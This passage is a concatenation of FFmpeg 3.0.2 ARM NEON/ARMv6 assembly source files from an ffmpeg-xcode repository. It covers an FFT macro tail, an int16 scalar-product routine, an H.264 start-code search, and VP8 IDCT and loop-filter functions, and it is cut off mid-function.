pop {v1-v2,v5-v6,pc}
.else
.set o1, 2*(\n/4/2)
.set o2, 4*(\n/4/2)
.set o3, 6*(\n/4/2)
pass (\n/4/2), v1, v1, v1, v1
pop {v1,v5-v6,pc}
.endif
endfunc
function fft\n\()_vfp
ldr a3, =0x03030000 /* RunFast mode, vector length 4, stride 1 */
fmrx a2, FPSCR
fmxr FPSCR, a3
vpush {s16-s31}
mov ip, lr
bl .Lfft\n\()_internal_vfp
vpop {s16-s31}
fmxr FPSCR, a2
bx ip
endfunc
.ltorg
.endm
def_fft 32, 16, 8
def_fft 64, 32, 16
def_fft 128, 64, 32
def_fft 256, 128, 64
def_fft 512, 256, 128
def_fft 1024, 512, 256
def_fft 2048, 1024, 512
def_fft 4096, 2048, 1024
def_fft 8192, 4096, 2048
def_fft 16384, 8192, 4096
def_fft 32768, 16384, 8192
def_fft 65536, 32768, 16384
|
Akagi201/ffmpeg-xcode
| 2,300
|
ffmpeg-3.0.2/libavcodec/arm/lossless_audiodsp_neon.S
|
/*
* ARM NEON optimised integer operations
* Copyright (c) 2009 Kostya Shishkov
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ scalarproduct_and_madd_int16(/*aligned*/v0,v1,v2,order,mul)
function ff_scalarproduct_and_madd_int16_neon, export=1
vld1.16 {d28[],d29[]}, [sp]
vmov.i16 q0, #0
vmov.i16 q1, #0
vmov.i16 q2, #0
vmov.i16 q3, #0
mov r12, r0
1: vld1.16 {d16-d17}, [r0,:128]!
vld1.16 {d18-d19}, [r1]!
vld1.16 {d20-d21}, [r2]!
vld1.16 {d22-d23}, [r0,:128]!
vld1.16 {d24-d25}, [r1]!
vld1.16 {d26-d27}, [r2]!
vmul.s16 q10, q10, q14
vmul.s16 q13, q13, q14
vmlal.s16 q0, d16, d18
vmlal.s16 q1, d17, d19
vadd.s16 q10, q8, q10
vadd.s16 q13, q11, q13
vmlal.s16 q2, d22, d24
vmlal.s16 q3, d23, d25
vst1.16 {q10}, [r12,:128]!
subs r3, r3, #16
vst1.16 {q13}, [r12,:128]!
bgt 1b
vpadd.s32 d16, d0, d1
vpadd.s32 d17, d2, d3
vpadd.s32 d18, d4, d5
vpadd.s32 d19, d6, d7
vpadd.s32 d0, d16, d17
vpadd.s32 d1, d18, d19
vpadd.s32 d2, d0, d1
vpaddl.s32 d3, d2
vmov.32 r0, d3[0]
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 7,543
|
ffmpeg-3.0.2/libavcodec/arm/startcode_armv6.S
|
/*
* Copyright (c) 2013 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
RESULT .req a1
BUF .req a1
SIZE .req a2
PATTERN .req a3
PTR .req a4
DAT0 .req v1
DAT1 .req v2
DAT2 .req v3
DAT3 .req v4
TMP0 .req v5
TMP1 .req v6
TMP2 .req ip
TMP3 .req lr
#define PRELOAD_DISTANCE 4
.macro innerloop4
ldr DAT0, [PTR], #4
subs SIZE, SIZE, #4 @ C flag survives rest of macro
sub TMP0, DAT0, PATTERN, lsr #14
bic TMP0, TMP0, DAT0
ands TMP0, TMP0, PATTERN
.endm
.macro innerloop16 decrement, do_preload
ldmia PTR!, {DAT0,DAT1,DAT2,DAT3}
.ifnc "\do_preload",""
pld [PTR, #PRELOAD_DISTANCE*32]
.endif
.ifnc "\decrement",""
subs SIZE, SIZE, #\decrement @ C flag survives rest of macro
.endif
sub TMP0, DAT0, PATTERN, lsr #14
sub TMP1, DAT1, PATTERN, lsr #14
bic TMP0, TMP0, DAT0
bic TMP1, TMP1, DAT1
sub TMP2, DAT2, PATTERN, lsr #14
sub TMP3, DAT3, PATTERN, lsr #14
ands TMP0, TMP0, PATTERN
bic TMP2, TMP2, DAT2
it eq
andseq TMP1, TMP1, PATTERN
bic TMP3, TMP3, DAT3
itt eq
andseq TMP2, TMP2, PATTERN
andseq TMP3, TMP3, PATTERN
.endm
/* int ff_startcode_find_candidate_armv6(const uint8_t *buf, int size) */
function ff_startcode_find_candidate_armv6, export=1
push {v1-v6,lr}
mov PTR, BUF
@ Ensure there are at least (PRELOAD_DISTANCE+2) complete cachelines to go
@ before using code that does preloads
cmp SIZE, #(PRELOAD_DISTANCE+3)*32 - 1
blo 60f
@ Get to word-alignment, 1 byte at a time
tst PTR, #3
beq 2f
1: ldrb DAT0, [PTR], #1
sub SIZE, SIZE, #1
teq DAT0, #0
beq 90f
tst PTR, #3
bne 1b
2: @ Get to 4-word alignment, 1 word at a time
ldr PATTERN, =0x80008000
setend be
tst PTR, #12
beq 4f
3: innerloop4
bne 91f
tst PTR, #12
bne 3b
4: @ Get to cacheline (8-word) alignment
tst PTR, #16
beq 5f
innerloop16 16
bne 93f
5: @ Check complete cachelines, with preloading
@ We need to stop when there are still (PRELOAD_DISTANCE+1)
@ complete cachelines to go
sub SIZE, SIZE, #(PRELOAD_DISTANCE+2)*32
6: innerloop16 , do_preload
bne 93f
innerloop16 32
bne 93f
bcs 6b
@ Preload trailing part-cacheline, if any
tst SIZE, #31
beq 7f
pld [PTR, #(PRELOAD_DISTANCE+1)*32]
@ Check remaining data without doing any more preloads. First
@ do in chunks of 4 words:
7: adds SIZE, SIZE, #(PRELOAD_DISTANCE+2)*32 - 16
bmi 9f
8: innerloop16 16
bne 93f
bcs 8b
@ Then in words:
9: adds SIZE, SIZE, #16 - 4
bmi 11f
10: innerloop4
bne 91f
bcs 10b
11: setend le
@ Check second byte of final halfword
ldrb DAT0, [PTR, #-1]
teq DAT0, #0
beq 90f
@ Check any remaining bytes
tst SIZE, #3
beq 13f
12: ldrb DAT0, [PTR], #1
sub SIZE, SIZE, #1
teq DAT0, #0
beq 90f
tst SIZE, #3
bne 12b
@ No candidate found
13: sub RESULT, PTR, BUF
b 99f
60: @ Small buffer - simply check by looping over bytes
subs SIZE, SIZE, #1
bcc 99f
61: ldrb DAT0, [PTR], #1
subs SIZE, SIZE, #1
teq DAT0, #0
beq 90f
bcs 61b
@ No candidate found
sub RESULT, PTR, BUF
b 99f
90: @ Found a candidate at the preceding byte
sub RESULT, PTR, BUF
sub RESULT, RESULT, #1
b 99f
91: @ Found a candidate somewhere in the preceding 4 bytes
sub RESULT, PTR, BUF
sub RESULT, RESULT, #4
sub TMP0, DAT0, #0x20000
bics TMP0, TMP0, DAT0
itt pl
ldrbpl DAT0, [PTR, #-3]
addpl RESULT, RESULT, #2
bpl 92f
teq RESULT, #0
beq 98f @ don't look back a byte if found at first byte in buffer
ldrb DAT0, [PTR, #-5]
92: teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
b 98f
93: @ Found a candidate somewhere in the preceding 16 bytes
sub RESULT, PTR, BUF
sub RESULT, RESULT, #16
teq TMP0, #0
beq 95f @ not in first 4 bytes
sub TMP0, DAT0, #0x20000
bics TMP0, TMP0, DAT0
itt pl
ldrbpl DAT0, [PTR, #-15]
addpl RESULT, RESULT, #2
bpl 94f
teq RESULT, #0
beq 98f @ don't look back a byte if found at first byte in buffer
ldrb DAT0, [PTR, #-17]
94: teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
b 98f
95: add RESULT, RESULT, #4
teq TMP1, #0
beq 96f @ not in next 4 bytes
sub TMP1, DAT1, #0x20000
bics TMP1, TMP1, DAT1
itee mi
ldrbmi DAT0, [PTR, #-13]
ldrbpl DAT0, [PTR, #-11]
addpl RESULT, RESULT, #2
teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
b 98f
96: add RESULT, RESULT, #4
teq TMP2, #0
beq 97f @ not in next 4 bytes
sub TMP2, DAT2, #0x20000
bics TMP2, TMP2, DAT2
itee mi
ldrbmi DAT0, [PTR, #-9]
ldrbpl DAT0, [PTR, #-7]
addpl RESULT, RESULT, #2
teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
b 98f
97: add RESULT, RESULT, #4
sub TMP3, DAT3, #0x20000
bics TMP3, TMP3, DAT3
itee mi
ldrbmi DAT0, [PTR, #-5]
ldrbpl DAT0, [PTR, #-3]
addpl RESULT, RESULT, #2
teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
@ drop through to 98f
98: setend le
99: pop {v1-v6,pc}
endfunc
.unreq RESULT
.unreq BUF
.unreq SIZE
.unreq PATTERN
.unreq PTR
.unreq DAT0
.unreq DAT1
.unreq DAT2
.unreq DAT3
.unreq TMP0
.unreq TMP1
.unreq TMP2
.unreq TMP3
|
Akagi201/ffmpeg-xcode
| 66,867
|
ffmpeg-3.0.2/libavcodec/arm/vp8dsp_neon.S
|
/*
* VP8 NEON optimisations
*
* Copyright (c) 2010 Rob Clark <rob@ti.com>
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#include "neon.S"
function ff_vp8_luma_dc_wht_neon, export=1
vld1.16 {q0-q1}, [r1,:128]
vmov.i16 q15, #0
vadd.i16 d4, d0, d3
vadd.i16 d6, d1, d2
vst1.16 {q15}, [r1,:128]!
vsub.i16 d7, d1, d2
vsub.i16 d5, d0, d3
vst1.16 {q15}, [r1,:128]
vadd.i16 q0, q2, q3
vsub.i16 q1, q2, q3
vmov.i16 q8, #3
vtrn.32 d0, d2
vtrn.32 d1, d3
vtrn.16 d0, d1
vtrn.16 d2, d3
vadd.i16 d0, d0, d16
vadd.i16 d4, d0, d3
vadd.i16 d6, d1, d2
vsub.i16 d7, d1, d2
vsub.i16 d5, d0, d3
vadd.i16 q0, q2, q3
vsub.i16 q1, q2, q3
vshr.s16 q0, q0, #3
vshr.s16 q1, q1, #3
mov r3, #32
vst1.16 {d0[0]}, [r0,:16], r3
vst1.16 {d1[0]}, [r0,:16], r3
vst1.16 {d2[0]}, [r0,:16], r3
vst1.16 {d3[0]}, [r0,:16], r3
vst1.16 {d0[1]}, [r0,:16], r3
vst1.16 {d1[1]}, [r0,:16], r3
vst1.16 {d2[1]}, [r0,:16], r3
vst1.16 {d3[1]}, [r0,:16], r3
vst1.16 {d0[2]}, [r0,:16], r3
vst1.16 {d1[2]}, [r0,:16], r3
vst1.16 {d2[2]}, [r0,:16], r3
vst1.16 {d3[2]}, [r0,:16], r3
vst1.16 {d0[3]}, [r0,:16], r3
vst1.16 {d1[3]}, [r0,:16], r3
vst1.16 {d2[3]}, [r0,:16], r3
vst1.16 {d3[3]}, [r0,:16], r3
bx lr
endfunc
function ff_vp8_idct_add_neon, export=1
vld1.16 {q0-q1}, [r1,:128]
movw r3, #20091
movt r3, #35468/2
vdup.32 d4, r3
vmull.s16 q12, d1, d4[0]
vmull.s16 q13, d3, d4[0]
vqdmulh.s16 d20, d1, d4[1]
vqdmulh.s16 d23, d3, d4[1]
vshrn.s32 d21, q12, #16
vshrn.s32 d22, q13, #16
vadd.s16 d21, d21, d1
vadd.s16 d22, d22, d3
vadd.s16 d16, d0, d2
vsub.s16 d17, d0, d2
vadd.s16 d18, d21, d23
vsub.s16 d19, d20, d22
vadd.s16 q0, q8, q9
vsub.s16 q1, q8, q9
vtrn.32 d0, d3
vtrn.32 d1, d2
vtrn.16 d0, d1
vtrn.16 d3, d2
vmov.i16 q15, #0
vmull.s16 q12, d1, d4[0]
vst1.16 {q15}, [r1,:128]!
vmull.s16 q13, d2, d4[0]
vst1.16 {q15}, [r1,:128]
vqdmulh.s16 d21, d1, d4[1]
vqdmulh.s16 d23, d2, d4[1]
vshrn.s32 d20, q12, #16
vshrn.s32 d22, q13, #16
vadd.i16 d20, d20, d1
vadd.i16 d22, d22, d2
vadd.i16 d16, d0, d3
vsub.i16 d17, d0, d3
vadd.i16 d18, d20, d23
vld1.32 {d20[]}, [r0,:32], r2
vsub.i16 d19, d21, d22
vld1.32 {d22[]}, [r0,:32], r2
vadd.s16 q0, q8, q9
vld1.32 {d23[]}, [r0,:32], r2
vsub.s16 q1, q8, q9
vld1.32 {d21[]}, [r0,:32], r2
vrshr.s16 q0, q0, #3
vtrn.32 q10, q11
vrshr.s16 q1, q1, #3
sub r0, r0, r2, lsl #2
vtrn.32 d0, d3
vtrn.32 d1, d2
vtrn.16 d0, d1
vtrn.16 d3, d2
vaddw.u8 q0, q0, d20
vaddw.u8 q1, q1, d21
vqmovun.s16 d0, q0
vqmovun.s16 d1, q1
vst1.32 {d0[0]}, [r0,:32], r2
vst1.32 {d0[1]}, [r0,:32], r2
vst1.32 {d1[1]}, [r0,:32], r2
vst1.32 {d1[0]}, [r0,:32], r2
bx lr
endfunc
function ff_vp8_idct_dc_add_neon, export=1
mov r3, #0
ldrsh r12, [r1]
strh r3, [r1]
vdup.16 q1, r12
vrshr.s16 q1, q1, #3
vld1.32 {d0[]}, [r0,:32], r2
vld1.32 {d1[]}, [r0,:32], r2
vld1.32 {d0[1]}, [r0,:32], r2
vld1.32 {d1[1]}, [r0,:32], r2
vaddw.u8 q2, q1, d0
vaddw.u8 q3, q1, d1
sub r0, r0, r2, lsl #2
vqmovun.s16 d0, q2
vqmovun.s16 d1, q3
vst1.32 {d0[0]}, [r0,:32], r2
vst1.32 {d1[0]}, [r0,:32], r2
vst1.32 {d0[1]}, [r0,:32], r2
vst1.32 {d1[1]}, [r0,:32], r2
bx lr
endfunc
function ff_vp8_idct_dc_add4uv_neon, export=1
vmov.i16 d0, #0
mov r3, #32
vld1.16 {d16[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d17[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d18[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d19[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
mov r3, r0
vrshr.s16 q8, q8, #3 @ dc >>= 3
vld1.8 {d0}, [r0,:64], r2
vrshr.s16 q9, q9, #3
vld1.8 {d1}, [r0,:64], r2
vaddw.u8 q10, q8, d0
vld1.8 {d2}, [r0,:64], r2
vaddw.u8 q0, q8, d1
vld1.8 {d3}, [r0,:64], r2
vaddw.u8 q11, q8, d2
vld1.8 {d4}, [r0,:64], r2
vaddw.u8 q1, q8, d3
vld1.8 {d5}, [r0,:64], r2
vaddw.u8 q12, q9, d4
vld1.8 {d6}, [r0,:64], r2
vaddw.u8 q2, q9, d5
vld1.8 {d7}, [r0,:64], r2
vaddw.u8 q13, q9, d6
vqmovun.s16 d20, q10
vaddw.u8 q3, q9, d7
vqmovun.s16 d21, q0
vqmovun.s16 d22, q11
vst1.8 {d20}, [r3,:64], r2
vqmovun.s16 d23, q1
vst1.8 {d21}, [r3,:64], r2
vqmovun.s16 d24, q12
vst1.8 {d22}, [r3,:64], r2
vqmovun.s16 d25, q2
vst1.8 {d23}, [r3,:64], r2
vqmovun.s16 d26, q13
vst1.8 {d24}, [r3,:64], r2
vqmovun.s16 d27, q3
vst1.8 {d25}, [r3,:64], r2
vst1.8 {d26}, [r3,:64], r2
vst1.8 {d27}, [r3,:64], r2
bx lr
endfunc
function ff_vp8_idct_dc_add4y_neon, export=1
vmov.i16 d0, #0
mov r3, #32
vld1.16 {d16[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d17[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d18[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d19[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vrshr.s16 q8, q8, #3 @ dc >>= 3
vld1.8 {q0}, [r0,:128], r2
vrshr.s16 q9, q9, #3
vld1.8 {q1}, [r0,:128], r2
vaddw.u8 q10, q8, d0
vld1.8 {q2}, [r0,:128], r2
vaddw.u8 q0, q9, d1
vld1.8 {q3}, [r0,:128], r2
vaddw.u8 q11, q8, d2
vaddw.u8 q1, q9, d3
vaddw.u8 q12, q8, d4
vaddw.u8 q2, q9, d5
vaddw.u8 q13, q8, d6
vaddw.u8 q3, q9, d7
sub r0, r0, r2, lsl #2
vqmovun.s16 d20, q10
vqmovun.s16 d21, q0
vqmovun.s16 d22, q11
vqmovun.s16 d23, q1
vqmovun.s16 d24, q12
vst1.8 {q10}, [r0,:128], r2
vqmovun.s16 d25, q2
vst1.8 {q11}, [r0,:128], r2
vqmovun.s16 d26, q13
vst1.8 {q12}, [r0,:128], r2
vqmovun.s16 d27, q3
vst1.8 {q13}, [r0,:128], r2
bx lr
endfunc
@ Register layout:
@ P3..Q3 -> q0..q7
@ flim_E -> q14
@ flim_I -> q15
@ hev_thresh -> r12
@
.macro vp8_loop_filter, inner=0, simple=0
.if \simple
vabd.u8 q9, q3, q4 @ abs(P0-Q0)
vabd.u8 q15, q2, q5 @ abs(P1-Q1)
vqadd.u8 q9, q9, q9 @ abs(P0-Q0) * 2
vshr.u8 q10, q15, #1 @ abs(P1-Q1) / 2
vqadd.u8 q11, q9, q10 @ (abs(P0-Q0)*2) + (abs(P1-Q1)/2)
vmov.i8 q13, #0x80
vcle.u8 q8, q11, q14 @ (abs(P0-Q0)*2) + (abs(P1-Q1)/2) <= flim
.else
@ calculate hev and normal_limit:
vabd.u8 q12, q2, q3 @ abs(P1-P0)
vabd.u8 q13, q5, q4 @ abs(Q1-Q0)
vabd.u8 q10, q0, q1 @ abs(P3-P2)
vabd.u8 q11, q1, q2 @ abs(P2-P1)
vcle.u8 q8, q12, q15 @ abs(P1-P0) <= flim_I
vcle.u8 q9, q13, q15 @ abs(Q1-Q0) <= flim_I
vcle.u8 q10, q10, q15 @ abs(P3-P2) <= flim_I
vcle.u8 q11, q11, q15 @ abs(P2-P1) <= flim_I
vand q8, q8, q9
vabd.u8 q9, q7, q6 @ abs(Q3-Q2)
vand q8, q8, q11
vabd.u8 q11, q6, q5 @ abs(Q2-Q1)
vand q8, q8, q10
vcle.u8 q10, q9, q15 @ abs(Q3-Q2) <= flim_I
vcle.u8 q11, q11, q15 @ abs(Q2-Q1) <= flim_I
vabd.u8 q9, q3, q4 @ abs(P0-Q0)
vabd.u8 q15, q2, q5 @ abs(P1-Q1)
vand q8, q8, q10
vqadd.u8 q9, q9, q9 @ abs(P0-Q0) * 2
vand q8, q8, q11
vshr.u8 q10, q15, #1 @ abs(P1-Q1) / 2
vdup.8 q15, r12 @ hev_thresh
vqadd.u8 q11, q9, q10 @ (abs(P0-Q0)*2) + (abs(P1-Q1)/2)
vcgt.u8 q12, q12, q15 @ abs(P1-P0) > hev_thresh
vcle.u8 q11, q11, q14 @ (abs(P0-Q0)*2) + (abs(P1-Q1)/2) <= flim_E
vcgt.u8 q14, q13, q15 @ abs(Q1-Q0) > hev_thresh
vand q8, q8, q11
vmov.i8 q13, #0x80
vorr q9, q12, q14
.endif
@ at this point:
@ q8: normal_limit
@ q9: hev
@ convert to signed value:
veor q3, q3, q13 @ PS0 = P0 ^ 0x80
veor q4, q4, q13 @ QS0 = Q0 ^ 0x80
vmov.i16 q12, #3
vsubl.s8 q10, d8, d6 @ QS0 - PS0
vsubl.s8 q11, d9, d7 @ (widened to 16bit)
veor q2, q2, q13 @ PS1 = P1 ^ 0x80
veor q5, q5, q13 @ QS1 = Q1 ^ 0x80
vmul.i16 q10, q10, q12 @ w = 3 * (QS0 - PS0)
vmul.i16 q11, q11, q12
vqsub.s8 q12, q2, q5 @ clamp(PS1-QS1)
vmov.i8 q14, #4
vmov.i8 q15, #3
.if \inner
vand q12, q12, q9 @ if(hev) w += clamp(PS1-QS1)
.endif
vaddw.s8 q10, q10, d24 @ w += clamp(PS1-QS1)
vaddw.s8 q11, q11, d25
vqmovn.s16 d20, q10 @ narrow result back into q10
vqmovn.s16 d21, q11
.if !\inner && !\simple
veor q1, q1, q13 @ PS2 = P2 ^ 0x80
veor q6, q6, q13 @ QS2 = Q2 ^ 0x80
.endif
vand q10, q10, q8 @ w &= normal_limit
@ registers used at this point..
@ q0 -> P3 (don't corrupt)
@ q1-q6 -> PS2-QS2
@ q7 -> Q3 (don't corrupt)
@ q9 -> hev
@ q10 -> w
@ q13 -> #0x80
@ q14 -> #4
@ q15 -> #3
@ q8, q11, q12 -> unused
@ filter_common: is4tap==1
@ c1 = clamp(w + 4) >> 3;
@ c2 = clamp(w + 3) >> 3;
@ Q0 = s2u(QS0 - c1);
@ P0 = s2u(PS0 + c2);
.if \simple
vqadd.s8 q11, q10, q14 @ c1 = clamp((w&hev)+4)
vqadd.s8 q12, q10, q15 @ c2 = clamp((w&hev)+3)
vshr.s8 q11, q11, #3 @ c1 >>= 3
vshr.s8 q12, q12, #3 @ c2 >>= 3
vqsub.s8 q4, q4, q11 @ QS0 = clamp(QS0-c1)
vqadd.s8 q3, q3, q12 @ PS0 = clamp(PS0+c2)
veor q4, q4, q13 @ Q0 = QS0 ^ 0x80
veor q3, q3, q13 @ P0 = PS0 ^ 0x80
veor q5, q5, q13 @ Q1 = QS1 ^ 0x80
veor q2, q2, q13 @ P1 = PS1 ^ 0x80
.elseif \inner
@ the !is4tap case of filter_common, only used for inner blocks
@ c3 = ((c1&~hev) + 1) >> 1;
@ Q1 = s2u(QS1 - c3);
@ P1 = s2u(PS1 + c3);
vqadd.s8 q11, q10, q14 @ c1 = clamp((w&hev)+4)
vqadd.s8 q12, q10, q15 @ c2 = clamp((w&hev)+3)
vshr.s8 q11, q11, #3 @ c1 >>= 3
vshr.s8 q12, q12, #3 @ c2 >>= 3
vqsub.s8 q4, q4, q11 @ QS0 = clamp(QS0-c1)
vqadd.s8 q3, q3, q12 @ PS0 = clamp(PS0+c2)
vbic q11, q11, q9 @ c1 & ~hev
veor q4, q4, q13 @ Q0 = QS0 ^ 0x80
vrshr.s8 q11, q11, #1 @ c3 >>= 1
veor q3, q3, q13 @ P0 = PS0 ^ 0x80
vqsub.s8 q5, q5, q11 @ QS1 = clamp(QS1-c3)
vqadd.s8 q2, q2, q11 @ PS1 = clamp(PS1+c3)
veor q5, q5, q13 @ Q1 = QS1 ^ 0x80
veor q2, q2, q13 @ P1 = PS1 ^ 0x80
.else
vand q12, q10, q9 @ w & hev
vqadd.s8 q11, q12, q14 @ c1 = clamp((w&hev)+4)
vqadd.s8 q12, q12, q15 @ c2 = clamp((w&hev)+3)
vshr.s8 q11, q11, #3 @ c1 >>= 3
vshr.s8 q12, q12, #3 @ c2 >>= 3
vbic q10, q10, q9 @ w &= ~hev
vqsub.s8 q4, q4, q11 @ QS0 = clamp(QS0-c1)
vqadd.s8 q3, q3, q12 @ PS0 = clamp(PS0+c2)
@ filter_mbedge:
@ a = clamp((27*w + 63) >> 7);
@ Q0 = s2u(QS0 - a);
@ P0 = s2u(PS0 + a);
@ a = clamp((18*w + 63) >> 7);
@ Q1 = s2u(QS1 - a);
@ P1 = s2u(PS1 + a);
@ a = clamp((9*w + 63) >> 7);
@ Q2 = s2u(QS2 - a);
@ P2 = s2u(PS2 + a);
vmov.i16 q9, #63
vshll.s8 q14, d20, #3
vshll.s8 q15, d21, #3
vaddw.s8 q14, q14, d20
vaddw.s8 q15, q15, d21
vadd.s16 q8, q9, q14
vadd.s16 q9, q9, q15 @ 9*w + 63
vadd.s16 q11, q8, q14
vadd.s16 q12, q9, q15 @ 18*w + 63
vadd.s16 q14, q11, q14
vadd.s16 q15, q12, q15 @ 27*w + 63
vqshrn.s16 d16, q8, #7
vqshrn.s16 d17, q9, #7 @ clamp(( 9*w + 63)>>7)
vqshrn.s16 d22, q11, #7
vqshrn.s16 d23, q12, #7 @ clamp((18*w + 63)>>7)
vqshrn.s16 d28, q14, #7
vqshrn.s16 d29, q15, #7 @ clamp((27*w + 63)>>7)
vqadd.s8 q1, q1, q8 @ PS2 = clamp(PS2+a)
vqsub.s8 q6, q6, q8 @ QS2 = clamp(QS2-a)
vqadd.s8 q2, q2, q11 @ PS1 = clamp(PS1+a)
vqsub.s8 q5, q5, q11 @ QS1 = clamp(QS1-a)
vqadd.s8 q3, q3, q14 @ PS0 = clamp(PS0+a)
vqsub.s8 q4, q4, q14 @ QS0 = clamp(QS0-a)
veor q3, q3, q13 @ P0 = PS0 ^ 0x80
veor q4, q4, q13 @ Q0 = QS0 ^ 0x80
veor q2, q2, q13 @ P1 = PS1 ^ 0x80
veor q5, q5, q13 @ Q1 = QS1 ^ 0x80
veor q1, q1, q13 @ P2 = PS2 ^ 0x80
veor q6, q6, q13 @ Q2 = QS2 ^ 0x80
.endif
.endm
.macro vp8_v_loop_filter16 name, inner=0, simple=0
function ff_vp8_v_loop_filter16\name\()_neon, export=1
vpush {q4-q7}
sub r0, r0, r1, lsl #1+!\simple
@ Load pixels:
.if !\simple
ldr r12, [sp, #64] @ hev_thresh
vld1.8 {q0}, [r0,:128], r1 @ P3
vld1.8 {q1}, [r0,:128], r1 @ P2
.endif
vld1.8 {q2}, [r0,:128], r1 @ P1
vld1.8 {q3}, [r0,:128], r1 @ P0
vld1.8 {q4}, [r0,:128], r1 @ Q0
vld1.8 {q5}, [r0,:128], r1 @ Q1
.if !\simple
vld1.8 {q6}, [r0,:128], r1 @ Q2
vld1.8 {q7}, [r0,:128] @ Q3
vdup.8 q15, r3 @ flim_I
.endif
vdup.8 q14, r2 @ flim_E
vp8_loop_filter inner=\inner, simple=\simple
@ back up to P2: dst -= stride * 6
sub r0, r0, r1, lsl #2
.if !\simple
sub r0, r0, r1, lsl #1
@ Store pixels:
vst1.8 {q1}, [r0,:128], r1 @ P2
.endif
vst1.8 {q2}, [r0,:128], r1 @ P1
vst1.8 {q3}, [r0,:128], r1 @ P0
vst1.8 {q4}, [r0,:128], r1 @ Q0
vst1.8 {q5}, [r0,:128], r1 @ Q1
.if !\simple
vst1.8 {q6}, [r0,:128] @ Q2
.endif
vpop {q4-q7}
bx lr
endfunc
.endm
vp8_v_loop_filter16
vp8_v_loop_filter16 _inner, inner=1
vp8_v_loop_filter16 _simple, simple=1
.macro vp8_v_loop_filter8uv name, inner=0
function ff_vp8_v_loop_filter8uv\name\()_neon, export=1
vpush {q4-q7}
sub r0, r0, r2, lsl #2
sub r1, r1, r2, lsl #2
ldr r12, [sp, #64] @ flim_I
@ Load pixels:
vld1.8 {d0}, [r0,:64], r2 @ P3
vld1.8 {d1}, [r1,:64], r2 @ P3
vld1.8 {d2}, [r0,:64], r2 @ P2
vld1.8 {d3}, [r1,:64], r2 @ P2
vld1.8 {d4}, [r0,:64], r2 @ P1
vld1.8 {d5}, [r1,:64], r2 @ P1
vld1.8 {d6}, [r0,:64], r2 @ P0
vld1.8 {d7}, [r1,:64], r2 @ P0
vld1.8 {d8}, [r0,:64], r2 @ Q0
vld1.8 {d9}, [r1,:64], r2 @ Q0
vld1.8 {d10}, [r0,:64], r2 @ Q1
vld1.8 {d11}, [r1,:64], r2 @ Q1
vld1.8 {d12}, [r0,:64], r2 @ Q2
vld1.8 {d13}, [r1,:64], r2 @ Q2
vld1.8 {d14}, [r0,:64] @ Q3
vld1.8 {d15}, [r1,:64] @ Q3
vdup.8 q14, r3 @ flim_E
vdup.8 q15, r12 @ flim_I
ldr r12, [sp, #68] @ hev_thresh
vp8_loop_filter inner=\inner
@ back up to P2: u,v -= stride * 6
sub r0, r0, r2, lsl #2
sub r1, r1, r2, lsl #2
sub r0, r0, r2, lsl #1
sub r1, r1, r2, lsl #1
@ Store pixels:
vst1.8 {d2}, [r0,:64], r2 @ P2
vst1.8 {d3}, [r1,:64], r2 @ P2
vst1.8 {d4}, [r0,:64], r2 @ P1
vst1.8 {d5}, [r1,:64], r2 @ P1
vst1.8 {d6}, [r0,:64], r2 @ P0
vst1.8 {d7}, [r1,:64], r2 @ P0
vst1.8 {d8}, [r0,:64], r2 @ Q0
vst1.8 {d9}, [r1,:64], r2 @ Q0
vst1.8 {d10}, [r0,:64], r2 @ Q1
vst1.8 {d11}, [r1,:64], r2 @ Q1
vst1.8 {d12}, [r0,:64] @ Q2
vst1.8 {d13}, [r1,:64] @ Q2
vpop {q4-q7}
bx lr
endfunc
.endm
vp8_v_loop_filter8uv
vp8_v_loop_filter8uv _inner, inner=1
.macro vp8_h_loop_filter16 name, inner=0, simple=0
function ff_vp8_h_loop_filter16\name\()_neon, export=1
vpush {q4-q7}
